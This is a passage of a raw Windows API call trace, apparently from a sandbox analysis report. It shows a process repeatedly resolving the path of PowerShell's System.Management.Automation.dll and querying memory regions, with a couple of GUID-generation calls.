	[0146.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.175] VirtualQuery (in: lpAddress=0x1cb9d0, lpBuffer=0x1cc890, dwLength=0x30 | out: lpBuffer=0x1cc890*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.176] VirtualQuery (in: lpAddress=0x1cb9d0, lpBuffer=0x1cc890, dwLength=0x30 | out: lpBuffer=0x1cc890*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.177] VirtualQuery (in: lpAddress=0x1cb0c0, lpBuffer=0x1cbf80, dwLength=0x30 | out: lpBuffer=0x1cbf80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.177] VirtualQuery (in: lpAddress=0x1cb150, lpBuffer=0x1cc010, dwLength=0x30 | out: lpBuffer=0x1cc010*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.178] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.178] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.179] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.179] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.179] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.179] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.180] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.180] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.180] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.180] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.193] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.193] VirtualQuery (in: lpAddress=0x1cb500, lpBuffer=0x1cc3c0, dwLength=0x30 | out: lpBuffer=0x1cc3c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.193] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.193] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.193] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.194] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.194] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x1e63d578, Data2=0xb3ca, Data3=0x4528, Data4=([0]=0x84, [1]=0x26, [2]=0x6, [3]=0xb9, [4]=0xa1, [5]=0xf4, [6]=0x37, [7]=0x12))) returned 0x0
	[0146.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.197] VirtualQuery (in: lpAddress=0x1cb0c0, lpBuffer=0x1cbf80, dwLength=0x30 | out: lpBuffer=0x1cbf80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.198] VirtualQuery (in: lpAddress=0x1cb150, lpBuffer=0x1cc010, dwLength=0x30 | out: lpBuffer=0x1cc010*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.198] VirtualQuery (in: lpAddress=0x1cb370, lpBuffer=0x1cc230, dwLength=0x30 | out: lpBuffer=0x1cc230*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0146.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x4896d369, Data2=0x3741, Data3=0x4c2c, Data4=([0]=0x87, [1]=0xb5, [2]=0x68, [3]=0x83, [4]=0x9d, [5]=0x9, [6]=0x8f, [7]=0x2b))) returned 0x0
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
